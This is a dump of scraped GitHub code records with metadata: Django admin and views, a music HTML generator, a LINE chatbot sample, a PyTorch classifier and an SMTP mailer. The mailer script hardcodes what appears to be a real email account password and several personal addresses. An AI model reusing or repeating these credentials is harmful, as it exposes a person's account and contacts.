"line_number": 609, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 609, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 610, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 610, "usage_type": "name"}, {"api_name": "utils.focal_loss.focal_loss", "line_number": 615, "usage_type": "call"}, {"api_name": "utils.focal_loss", "line_number": 615, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 615, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 615, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 617, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 617, "usage_type": "name"}, {"api_name": "utils.focal_loss.focal_loss", "line_number": 625, "usage_type": "call"}, {"api_name": "utils.focal_loss", "line_number": 625, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 625, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 625, "usage_type": "name"}, {"api_name": "torch.nn.functional.softmax", "line_number": 639, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 639, "usage_type": "name"}, {"api_name": "core.config.cfg.TRAIN", "line_number": 645, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 645, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 652, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 652, "usage_type": "call"}, {"api_name": "core.config.cfg.MODEL", "line_number": 653, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 653, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 654, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 654, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 666, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 666, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 671, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 671, "usage_type": "call"}]}
+{"seq_id": "14542331662", "text": "from django.contrib import admin\nfrom django.contrib.auth.forms import UserCreationForm\n\nfrom user.models import User\n\nbase_list_display = ('id', 'first_name', 'last_name', 'email')\nextended_list = base_list_display + ('username', 'role')\n\n\nclass CustomUserCreationForm(UserCreationForm):\n \"\"\"\n User creation form.\n \"\"\"\n\n class Meta:\n model = User\n fields = [item for item in extended_list if item != 'id']\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in extended_list:\n if field != 'id':\n self.fields[field].required = True\n\n\n@admin.register(User)\nclass UserAdmin(admin.ModelAdmin):\n list_display = extended_list\n form = CustomUserCreationForm\n", "repo_name": "hahaSK/IIS_Cinema", "sub_path": "user/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 760, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.contrib.auth.forms.UserCreationForm", "line_number": 10, "usage_type": "name"}, {"api_name": "user.models.User", "line_number": 16, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 27, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 26, "usage_type": "call"}, {"api_name": "user.models.User", "line_number": 26, "usage_type": "argument"}, {"api_name": "django.contrib.admin", "line_number": 26, "usage_type": "name"}]}
+{"seq_id": "36530676891", "text": "# read music from music.json\n\nimport json\n\ndef big2Small(song):\n return {\"title\": song['song']['title'],\n \"artist\": song['artist']['name'] }\n\ndef songListToHTMLTable(songs):\n answer = \"\\n\" + songTableHeader()\n for song in songs:\n answer += song2HTMLTableRow(song)\n answer += \"
\\n\"\n return answer\n\ndef songTableHeader():\n return (\"\\n\" +\n \" Song Title \" +\n \" Artist Name \" + \n \" \\n\")\n\n\ndef song2HTMLTableRow(song):\n return (\"\\n\" +\n \"\" + song['song']['title'] + \" \" +\n \"\" + song['artist']['name'] + \" \" + \n \" \\n\")\n\n\ndef writeWebPage(filename,content,title):\n with open(filename,'w') as webpage:\n webpage.write(\"\\n\")\n webpage.write(\"\\n\")\n \n webpage.write(\"\\n\")\n styleElem = \"\"\"\n \n \n \"\"\"\n webpage.write(styleElem)\n \n webpage.write(\"\" + title + \" \\n\")\n webpage.write(\"\\n\")\n\n webpage.write(\"\\n\")\n webpage.write(content)\n webpage.write(\"\\n\")\n\n webpage.write(\"\\n\")\n \n\nif __name__==\"__main__\":\n with open('music.json') as json_data:\n songs = json.load(json_data)\n\n print(\"The variable songs now contains all the data\")\n\n print(\"The variable songs is a list of big complicated dictionaries\")\n print(\"We'd like a list of something easier to work with\")\n\n print(\"The function big2Small(song) will turn a big song dictionary\")\n print(\"into a smaller one\")\n \n writeWebPage(\"fiveSongs.html\",songListToHTMLTable(songs[5:10]),\"five songs\")\n \n", "repo_name": "ucsb-cs8-s18/LECTURE_05_08", "sub_path": "generateMusicWebPage.py", "file_name": "generateMusicWebPage.py", "file_ext": "py", "file_size_in_byte": 1830, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "json.load", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "30633158552", "text": "#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nfrom email import encoders\nfrom email.header import Header\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart, MIMEBase\nfrom email.mime.application import MIMEApplication\nfrom email.utils import parseaddr, formataddr\n\nimport smtplib\n\ndef _format_addr(s):\n name, addr = parseaddr(s)\n return formataddr((Header(name, 'utf-8').encode(), addr))\n\nfrom_addr = 'lhr_nicelife@163.com' # input('From: ')\npassword = 'Love20160120' #input('Password: ')\nto_addr = '152668252@qq.com, 376939627@qq.com' #input('To: ')\ncc_addr = 'linhanrui2006@163.com, henry.lin@ubtrobot.com'\nsmtp_server = 'smtp.163.com' #input('SMTP server: ')\n\n\n# 邮件对象:\nmsg = MIMEMultipart()\n\nmsg['From'] = _format_addr('163邮箱木木 <%s>' % from_addr)\nmsg['To'] = to_addr #_format_addr('卓灼上神 <%s>' % to_addr)\nmsg['Subject'] = Header('测试Python的邮件', 'utf-8').encode()\n\n# 邮件正文是MIMEText:\n# msg.attach(MIMEText('send with file...', 'plain', 'utf-8'))\nmsg.attach(MIMEText('Hello ' +\n # '
' +\n '', 'html', 'utf-8'))\n\n# 首先是xlsx类型的附件\nxlsxpart = MIMEApplication(open('good.xlsx', 'rb').read())\nxlsxpart.add_header('Content-Disposition', 'attachment', filename='better.xlsx')\nmsg.attach(xlsxpart)\n\n# jpg类型的附件\njpgpart = MIMEApplication(open('o13.jpg', 'rb').read())\njpgpart.add_header('Content-Disposition', 'attachment', filename='new.jpg')\njpgpart.add_header('Content-ID', '<0>')\njpgpart.add_header('X-Attachment-Id', '0')\nmsg.attach(jpgpart)\n\n# mp3类型的附件\nmp3part = MIMEApplication(open('aa.txt', 'rb').read())\nmp3part.add_header('Content-Disposition', 'attachment', filename='news.txt')\nmsg.attach(mp3part)\n\n# jpg类型的附件\njpgpart1 = MIMEApplication(open('眼影新包装3.jpg', 'rb').read())\njpgpart1.add_header('Content-Disposition', 'attachment', filename='aaa.jpg')\njpgpart1.add_header('Content-ID', '<1>')\nmsg.attach(jpgpart1)\n\n\nserver = smtplib.SMTP(smtp_server, 25)\nserver.set_debuglevel(1)\nserver.login(from_addr, password)\nserver.sendmail(from_addr, to_addr.split(\",\"), msg.as_string())\nserver.quit()", "repo_name": "EragoGeneral/python-demo", "sub_path": "network/SMTP/email_mul_attachment.py", "file_name": "email_mul_attachment.py", "file_ext": "py", "file_size_in_byte": 2182, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "email.utils.parseaddr", "line_number": 14, "usage_type": "call"}, {"api_name": "email.utils.formataddr", "line_number": 15, "usage_type": "call"}, {"api_name": "email.header.Header", "line_number": 15, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 25, "usage_type": "call"}, {"api_name": "email.header.Header", "line_number": 29, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 33, "usage_type": "call"}, {"api_name": "email.mime.application.MIMEApplication", "line_number": 38, "usage_type": "call"}, {"api_name": "email.mime.application.MIMEApplication", "line_number": 43, "usage_type": "call"}, {"api_name": "email.mime.application.MIMEApplication", "line_number": 50, "usage_type": "call"}, {"api_name": "email.mime.application.MIMEApplication", "line_number": 55, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 61, "usage_type": "call"}]}
+{"seq_id": "280710326", "text": "'''\nРћЈРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂ\nРћБ љђђ H╬ъLLT╬ъRH╬ъ╬ЏD р┤ёр┤Ј╩ђр┤ў.\nРћБ ┬Е 2020 р┤Їр┤Ј-╩Ўр┤ђ╔┤р┤бр┤ю\nРћЌРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂРћЂ\n'''\n\nfrom linepy import *\nfrom akad.ttypes import LiffChatContext, LiffContext, LiffSquareChatContext, LiffNoneContext, LiffViewRequest\nfrom template import Mobanzu\nimport requests, uvloop, json, threading, asyncio, livejson\n\nclient = LINE(\"EMAIL\", \"PASSWORD\") #USE_YOUR_EMAIL_AND_PASSWORD\nclient.log(\"Auth Token : \" + str(client.authToken))\n\npoll = OEPoll(client)\nmobflex = Mobanzu(client)\nloop = asyncio.get_event_loop()\n\ndef allow_liff():\n url = 'https://access.line.me/dialog/api/permissions'\n data = {'on': ['P', 'CM'], 'off': []}\n headers = {\n 'X-Line-Access': client.authToken,\n 'X-Line-Application': client.server.APP_NAME,\n 'X-Line-ChannelId': '1655425084',\n 'Content-Type': 'application/json'\n }\n requests.post(url, json=data, headers=headers)\n\ndef sendTemplate(to, data):\n drex = LiffChatContext(to)\n mobz = LiffContext(chat=drex)\n view = LiffViewRequest('1655425084-3OQ8Mn9J', mobz)\n token = client.liff.issueLiffView(view)\n url = 'https://api.line.me/message/v3/share'\n headers = {\n 'Content-Type': 'application/json',\n 'Authorization': 'Bearer %s' % token.accessToken\n }\n data = {\"messages\": [data]}\n requests.post(url, headers=headers, data=json.dumps(data))\n\ndef sendFlex(to, alt, flex):\n data = {\"type\": \"flex\", \"altText\": alt, \"contents\": flex}\n sendTemplate(to, data)\n\nasync def clientBot(op):\n try:\n if op.type == 0:\n# print(\"[ 0 ] END OF OPERATION\")\n return\n if op.type == 26:\n print(\"[ 26 ] RECEIVE MESSAGE\")\n msg = op.message\n text = msg.text\n id = msg.id\n to = msg.to\n receiver = msg.to\n sender = msg._from\n if msg.toType == 0 or msg.toType == 1 or msg.toType == 2:\n if msg.toType == 0:\n if sender != client.getProfile().mid: to = sender\n else: to = receiver\n if msg.toType == 1 or msg.toType == 2: to = msg.to\n if msg.contentType == 0:\n if None == msg.text: return\n cmd = msg.text.lower()\n if cmd == \"allowliff\":\n try: allow_liff(); client.sendReplyMessage(id, to, \"Access Granted For Flex Message.\")\n except: client.sendReplyMessage(id, to, \"line://app/LIFF_ID?type=text&text=Done\") #USE_YOUR_LIFF_ID\n try:\n if cmd == \"help\":\n contact = client.getContact(sender)\n name = contact.displayName\n status = contact.statusMessage if contact.statusMessage != '' else ' '\n try: picture = \"https://obs.line-scdn.net/\" + contact.pictureStatus\n except: picture = \"https://i.ibb.co/tczXyp1/hlth-Img-Not-Found.jpg\"\n sendFlex(to, \"Help Menu\", mobflex.helpMenu(picture, name, status))\n if cmd == \"profile\": sendFlex(to, \"Profile Menu\", mobflex.profileMenu())\n if cmd == \"group\": sendFlex(to, \"Group Menu\", mobflex.groupMenu())\n if cmd == \"media\": sendFlex(to, \"Media Menu\", mobflex.mediaMenu())\n if cmd == \"service\": sendFlex(to, \"Service Menu\", mobflex.serviceMenu())\n if cmd == \"system\": sendFlex(to, \"System Menu\", mobflex.systemMenu())\n if cmd == \"forum\": sendFlex(to, \"Forum Menu\", mobflex.forumMenu())\n except: client.sendReplyMessage(id, to, \"Access LIFF Required\\nPlease Type 'Allowliff' First.\")\n except Exception as error: print(error)\n\ndef run():\n while True:\n try:\n ops = poll.singleTrace(count=50)\n if ops != None:\n for op in ops:\n loop.run_until_complete(clientBot(op))\n poll.setRevision(op.revision)\n except Exception as error: print(error)\n\nif 
__name__ == \"__main__\":\n run()\n", "repo_name": "Mobanzu/mobflex", "sub_path": "sample.py", "file_name": "sample.py", "file_ext": "py", "file_size_in_byte": 4248, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "31", "api": [{"api_name": "template.Mobanzu", "line_number": 17, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 18, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 29, "usage_type": "call"}, {"api_name": "akad.ttypes.LiffChatContext", "line_number": 32, "usage_type": "call"}, {"api_name": "akad.ttypes.LiffContext", "line_number": 33, "usage_type": "call"}, {"api_name": "akad.ttypes.LiffViewRequest", "line_number": 34, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 42, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "11411593997", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\nRECORD_TIME = 0.2\nRATE = 44100\nCHUNK = RATE/30\n\nstorage = np.load('Data.npy')\n#for i in range(100):\n# print(storage[i])\nplt.figure(1)\nplt.plot(storage)\n#plt.plot((np.arange(storage.size/2)*(CHUNK/(RATE*RECORD_TIME))),storage)\nplt.show()\n", "repo_name": "mdasil44/CapstoneRaspberryPiCode", "sub_path": "Plot.py", "file_name": "Plot.py", "file_ext": "py", "file_size_in_byte": 292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.load", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}]}
+{"seq_id": "11903818182", "text": "from dlvc.datasets.pets import PetsDataset\nfrom dlvc.dataset import Subset\nfrom dlvc.batches import BatchGenerator\nfrom dlvc.test import Accuracy\nimport dlvc.ops as ops\nimport numpy as np\nimport torch\n\n\n# TODO: Define the network architecture of your linear classifier.\nclass LinearClassifier(torch.nn.Module):\n def __init__(self, input_dim, num_classes):\n super(LinearClassifier, self).__init__()\n\n self.input_dim = input_dim\n self.num_classes = num_classes\n\n # define network layer\n self.layer = torch.nn.Linear(self.input_dim, self.num_classes)\n\n def forward(self, x):\n return self.layer(x)\n\n\nop = ops.chain([\n ops.vectorize(),\n ops.type_cast(np.float32),\n ops.add(-127.5),\n ops.mul(1 / 127.5),\n])\n\n\ndef train_model(linear_classifier, criterion, optimizer, epochs, train_data, valid_data):\n acc = Accuracy()\n print(\"Train the network\")\n best_acc = 0.0\n for epoch in range(epochs):\n running_loss = 0.0\n acc.reset()\n for data in train_data:\n # get the inputs and the labels\n inputs = data.data\n labels = data.label\n\n # convert the np.array in tensor\n t_inputs = torch.tensor(inputs)\n t_labels = torch.tensor(labels).to(torch.long) #cast labels to long so the CE works (CE throws exception with int)\n\n # zero the parameter gradients, for every batch I must compute the gradient again\n optimizer.zero_grad()\n\n # forward step\n output = linear_classifier.forward(t_inputs)\n loss = criterion(output, t_labels)\n loss.backward() # compute the gradients\n optimizer.step() # update the parameter\n\n # print statistics\n running_loss += loss.item()\n acc.update(linear_classifier.forward(torch.tensor(valid_data.data)).detach().numpy(), valid_data.label)\n print(f\"epoch {epoch + 1} \\ntrain loss: {running_loss}\\nval accuracy: {acc.accuracy()}\")\n\n # update the values\n running_loss = 0.0\n if acc.accuracy() >= best_acc:\n best_acc = acc.accuracy()\n\n acc.reset()\n print(\"Finished Training\")\n return linear_classifier, best_acc\n\n\ndef main():\n fp = 'C:/Users/admin/Desktop/10. 
Semester/Computer Vision/dlvc_ss22/assignments/reference/cifar10'\n\n print(\"Load data\")\n train_ds = PetsDataset(fp, Subset.TRAINING)\n valid_ds = PetsDataset(fp, Subset.VALIDATION)\n test_ds = PetsDataset(fp, Subset.TEST)\n print(\"Data Loaded\")\n\n print(\"Creating Batch Generator\")\n train = BatchGenerator(train_ds, len(train_ds), False, op)\n valid = next(iter(BatchGenerator(valid_ds, len(valid_ds), False, op)))\n test = next(iter(BatchGenerator(test_ds, len(test_ds), False, op)))\n print(\"Batch Generator created\")\n\n #define general parameters\n in_features = 3072 # size of the vector in input\n epochs = 100\n\n #Test 1\n print(\"Create Linear Classifier, Loss Function and Optimizer\")\n lc = LinearClassifier(in_features, train_ds.num_classes())\n criterion = torch.nn.CrossEntropyLoss()\n optimizer = torch.optim.SGD(lc.parameters(), lr=0.001, momentum=0.9)\n\n lc_test_1, best_acc_test1 = train_model(lc, criterion, optimizer, epochs, train, valid)\n\n #Test 2, change the optimizer\n print(\"------------------------------------\")\n lc = LinearClassifier(in_features, train_ds.num_classes())\n optimizer = torch.optim.Adam(lc.parameters(), lr=0.001)\n lc_test_2, best_acc_test2 = train_model(lc, criterion, optimizer, epochs, train, valid)\n\n #find the best model\n if best_acc_test1 > best_acc_test2:\n lc = lc_test_1\n best_acc = best_acc_test1\n else:\n lc = lc_test_2\n best_acc = best_acc_test2\n\n print(\"--------------------\")\n print(f\"val accuracy (best): {best_acc}\")\n\n # compute the test accuracy\n test_acc = Accuracy()\n test_acc.update(lc.forward(torch.tensor(test.data)).detach().numpy(), test.label)\n print(f\"test accuracy: {test_acc.accuracy()}\")\n\n\nmain()", "repo_name": "onliner98/dlvc_ss22", "sub_path": "assignments/reference/linear_cats_and_dogs.py", "file_name": "linear_cats_and_dogs.py", "file_ext": "py", "file_size_in_byte": 4083, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.nn", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "attribute"}, {"api_name": "dlvc.ops.chain", "line_number": 25, "usage_type": "call"}, {"api_name": "dlvc.ops", "line_number": 25, "usage_type": "name"}, {"api_name": "dlvc.ops.vectorize", "line_number": 26, "usage_type": "call"}, {"api_name": "dlvc.ops", "line_number": 26, "usage_type": "name"}, {"api_name": "dlvc.ops.type_cast", "line_number": 27, "usage_type": "call"}, {"api_name": "dlvc.ops", "line_number": 27, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 27, "usage_type": "attribute"}, {"api_name": "dlvc.ops.add", "line_number": 28, "usage_type": "call"}, {"api_name": "dlvc.ops", "line_number": 28, "usage_type": "name"}, {"api_name": "dlvc.ops.mul", "line_number": 29, "usage_type": "call"}, {"api_name": "dlvc.ops", "line_number": 29, "usage_type": "name"}, {"api_name": "dlvc.test.Accuracy", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 47, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 60, "usage_type": "call"}, {"api_name": "dlvc.datasets.pets.PetsDataset", "line_number": 77, "usage_type": "call"}, {"api_name": "dlvc.dataset.Subset.TRAINING", "line_number": 77, "usage_type": 
"attribute"}, {"api_name": "dlvc.dataset.Subset", "line_number": 77, "usage_type": "name"}, {"api_name": "dlvc.datasets.pets.PetsDataset", "line_number": 78, "usage_type": "call"}, {"api_name": "dlvc.dataset.Subset.VALIDATION", "line_number": 78, "usage_type": "attribute"}, {"api_name": "dlvc.dataset.Subset", "line_number": 78, "usage_type": "name"}, {"api_name": "dlvc.datasets.pets.PetsDataset", "line_number": 79, "usage_type": "call"}, {"api_name": "dlvc.dataset.Subset.TEST", "line_number": 79, "usage_type": "attribute"}, {"api_name": "dlvc.dataset.Subset", "line_number": 79, "usage_type": "name"}, {"api_name": "dlvc.batches.BatchGenerator", "line_number": 83, "usage_type": "call"}, {"api_name": "dlvc.batches.BatchGenerator", "line_number": 84, "usage_type": "call"}, {"api_name": "dlvc.batches.BatchGenerator", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 95, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 96, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 103, "usage_type": "attribute"}, {"api_name": "dlvc.test.Accuracy", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 119, "usage_type": "call"}]}
+{"seq_id": "31828903725", "text": "import argparse\nfrom db_session import insert_object, get_user_id\nfrom db_model import User\nimport datetime\nimport os\n\nFOLDER_CURR = os.path.dirname(os.path.abspath(__file__))\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--id\", type=str,\n\thelp=\"id of user\")\nap.add_argument(\"-n\", \"--name\", type=str,\n\thelp=\"name of user\")\n\nargs = vars(ap.parse_args())\nid = args[\"id\"]\nname = args[\"name\"]\nrecords = get_user_id(name)\nif len(records) > 0:\n print('user is exist!')\nelse:\n folder = os.path.join(FOLDER_CURR, '..', 'datasets')\n path = os.path.join(folder, name)\n avatar = '/images/avatar/{0}/0.jpg'.format(name)\n if not os.path.isdir(path):\n os.mkdir(path)\n user = User(face_id=id, password=id, date_created = str(datetime.datetime.now()), level=1, fullname=name, avatar= avatar)\n insert_object(user)", "repo_name": "tuanvnext/face_recognize", "sub_path": "src/backend/user.py", "file_name": "user.py", "file_ext": "py", "file_size_in_byte": 832, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 7, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 8, "usage_type": "call"}, {"api_name": "db_session.get_user_id", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 25, "usage_type": "call"}, {"api_name": "db_model.User", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 26, "usage_type": "attribute"}, {"api_name": "db_session.insert_object", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "6069773247", "text": "from models import *\nfrom forms import *\nfrom inventory.models import BatchLoad\nfrom sales.models import *\nfrom common.views import DecimalEncoder\n\nfrom django.shortcuts import render_to_response, get_object_or_404, redirect\nfrom django.core import serializers\nfrom django.utils import simplejson\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom urllib import unquote\n\ndef get_name_query(term):\n words = term.split(\" \")\n if len(words) > 1:\n words = filter(lambda x: None or x.strip(), words)\n word_query = Q()\n for word in words:\n word_query &= Q(name__istartswith = word) | Q(name__icontains = \" \" + word)\n return word_query\n\n#\n# FORNITORI\n#\n\ndef find_supplier(request):\n if request.is_ajax():\n term = unquote(request.GET[\"term\"])\n name_query = get_name_query(term)\n matches = Supplier.objects.filter(name_query)\n result_list = []\n for supp in matches:\n result_list.append(supp.to_dict())\n if len(result_list) == 1:\n result_list[0][\"perfect_match\"] = True\n return HttpResponse(simplejson.dumps(result_list, cls=DecimalEncoder), 'application/javascript')\n else:\n return render_to_response('suppliers/find.html')\n\ndef add_supplier(request):\n if request.method == 'POST':\n form = SupplierForm(request.POST)\n if form.is_valid():\n new_supplier = form.save()\n if request.is_ajax():\n return render_to_response('suppliers/ajax_add.html')\n else:\n return redirect(show_supplier, new_supplier.id)\n else:\n form = SupplierForm()\n return render_to_response('suppliers/%sadd.html' % (request.is_ajax() and 'ajax_' or ''), {'form': form})\n\ndef show_supplier(request, id):\n supplier = get_object_or_404(Supplier, pk=id)\n return render_to_response('suppliers/show.html', {'supplier': supplier})\n\n#---- children of the show_supplier view\n\ndef supplier_info_tab(request, id):\n supplier = get_object_or_404(Supplier, pk=id)\n bad_request = False\n if request.method == \"POST\":\n form = SupplierForm(request.POST, instance = supplier)\n if form.is_valid():\n form.save()\n else:\n bad_request = True\n else:\n form = SupplierForm(instance = supplier)\n response = render_to_response('suppliers/tabs/info.html', {'form': form, 'supplier': supplier})\n if bad_request:\n response.status_code = 400\n return response\n\ndef supplier_history_tab(request, supplier_id):\n supplier = get_object_or_404(Supplier, pk=supplier_id)\n batchloads = BatchLoad.objects.filter(supplier = supplier, loaded = True).order_by(\"-date\")\n return render_to_response('suppliers/tabs/history.html', {'supplier': supplier, 'batchloads': batchloads})\n\n\n#\n# CLIENTI\n#\n\ndef find_customer(request):\n if request.is_ajax():\n term = unquote(request.GET[\"term\"])\n name_query = get_name_query(term)\n matches = Customer.objects.filter(name_query)\n result_list = []\n for cust in matches:\n result_list.append(cust.to_dict())\n if len(result_list) == 1:\n result_list[0][\"perfect_match\"] = True\n return HttpResponse(simplejson.dumps(result_list, cls=DecimalEncoder), 'application/javascript')\n else:\n return render_to_response('customers/find.html')\n\ndef add_customer(request):\n status = 200\n if request.is_ajax():\n Form = CustomerQuickForm\n else:\n Form = CustomerForm\n if request.method == 'POST':\n form = Form(request.POST)\n if form.is_valid():\n new_customer = form.save()\n if request.is_ajax():\n return HttpResponse(simplejson.dumps(new_customer.to_dict(), cls=DecimalEncoder), 'application/javascript')\n return redirect(show_customer, 
new_customer.id)\n else:\n status = 400\n else:\n form = Form()\n\n if request.is_ajax():\n response = render_to_response('customers/ajax_add.html', {'form': form})\n response.status_code = status\n return response\n else:\n return render_to_response('customers/add.html', {'form': form})\n\ndef add_company(request, pa=False):\n status = 200\n if request.is_ajax():\n Form = pa and PAQuickForm or CompanyQuickForm\n else:\n Form = pa and PAForm or CompanyForm\n if request.method == 'POST':\n form = Form(request.POST)\n if form.is_valid():\n new_company = form.save()\n if request.is_ajax():\n return HttpResponse(simplejson.dumps(new_company.to_dict(), cls=DecimalEncoder), 'application/javascript')\n return redirect(show_customer, new_company.id)\n else:\n status = 400\n else:\n form = Form()\n\n if request.is_ajax():\n response = render_to_response('customers/ajax_add_company.html', {'form': form, 'pa': pa})\n response.status_code = status\n return response\n else:\n return render_to_response('customers/add.html', {'form': form})\n\n\n\ndef show_customer(request, id):\n customer = get_object_or_404(Customer, pk=id)\n try:\n if customer.companycustomer:\n customer.company = customer.companycustomer\n except:\n pass\n return render_to_response('customers/show.html', {'customer': customer})\n\n\n#---- children of the show_customer view\n\ndef customer_info_tab(request, id):\n customer = get_object_or_404(Customer, pk=id)\n bad_request = False\n customer = customer.child()\n if customer.__class__ == PACustomer:\n Form = PAInfoForm\n elif customer.__class__ == CompanyCustomer:\n Form = CompanyInfoForm\n else:\n Form = CustomerInfoForm\n\n if request.method == \"POST\":\n form = Form(request.POST, instance = customer)\n if form.is_valid():\n form.save()\n else:\n bad_request = True\n else:\n form = Form(instance = customer)\n response = render_to_response('customers/tabs/info.html', {'form': form, 'customer': customer})\n if bad_request:\n response.status_code = 400\n return response\n\ndef customer_commercial_tab(request, id):\n customer = get_object_or_404(Customer, pk=id)\n bad_request = False\n try:\n customer = customer.companycustomer\n company = True\n except:\n company = False\n if company:\n Form = CompanyCommercialForm\n else:\n Form = CustomerCommercialForm\n\n if request.method == \"POST\":\n form = Form(request.POST, instance = customer)\n if form.is_valid():\n form.save()\n else:\n bad_request = True\n else:\n form = Form(instance = customer)\n response = render_to_response('customers/tabs/commercial.html', {'form': form, 'customer': customer})\n if bad_request:\n response.status_code = 400\n return response\n\ndef customer_history_tab(request, customer_id):\n customer = get_object_or_404(Customer, pk=customer_id)\n carts = Cart.objects.filter(customer = customer, receipt__isnull = False)\n receipts = Receipt.objects.filter(cart__in = carts)\n list = []\n for r in receipts:\n list.append(r.child())\n return render_to_response('customers/tabs/history.html', {'customer': customer.child(), 'receipts': list})\n", "repo_name": "marcor/silversly", "sub_path": "people/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7323, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.db.models.Q", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 20, "usage_type": "call"}, {"api_name": "urllib.unquote", "line_number": 29, "usage_type": "call"}, 
